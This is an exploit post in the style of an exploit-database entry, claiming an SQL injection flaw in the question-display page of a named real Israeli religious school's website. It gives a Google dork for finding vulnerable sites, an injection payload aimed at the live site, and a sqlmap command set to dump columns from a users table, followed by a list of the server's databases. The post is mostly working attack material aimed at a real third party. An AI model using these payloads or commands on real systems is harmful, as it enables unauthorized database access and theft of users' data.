-----------------------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Yelm ישיבת אלון מורה Sql İnjection Vulnerability
# Author : Cerkuday
# Google Dork : intile:"ישיבת אלון מורה" id=
# Tested on : Windows 10
# Date : 01.07.2019
# Vendor Home: http://www.yelm.co.il/
# Forum : http://www.Cyber-warrior.org/
------------------------------------------------------------------------------------------------------------------------------------------------
demo:http://www.yelm.co.il/ask_show.asp?id=294650
PoC
http://www.yelm.co.il/ask_show.asp?id=296488 AND 8059 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8059=8059) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)))
sqlmap -u "http://www.yelm.co.il/ask_show.asp?id=296488" --level=2 --risk=2 --random-agent --text-only --batch -v 3 -D kipa -T tbl_Egeret_users --columns
available databases [8]:
[*] babetov
[*] kipa
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
